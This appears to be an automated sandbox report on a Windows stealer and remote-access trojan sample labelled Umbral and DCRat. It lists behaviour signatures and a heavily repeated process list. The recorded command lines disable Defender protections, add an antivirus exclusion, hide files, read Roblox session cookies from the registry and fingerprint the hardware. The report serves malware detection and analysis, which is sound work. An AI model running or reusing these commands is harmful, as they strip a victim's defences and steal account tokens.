Analysis Overview
SHA256
862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06
Threat Level: Known bad
The file 862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe was found to be: Known bad.
Malicious Activity Summary
Umbral
Detect Umbral payload
DcRat
DCRat payload
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Unsigned PE
Enumerates physical storage devices
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Modifies registry class
Detects videocard installed
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-28 04:50
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-28 04:50
Reported
2024-06-28 04:52
Platform
win10v2004-20240508-en
Max time kernel
90s
Max time network
150s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Processes
C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\system32\PING.EXE
ping localhost
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
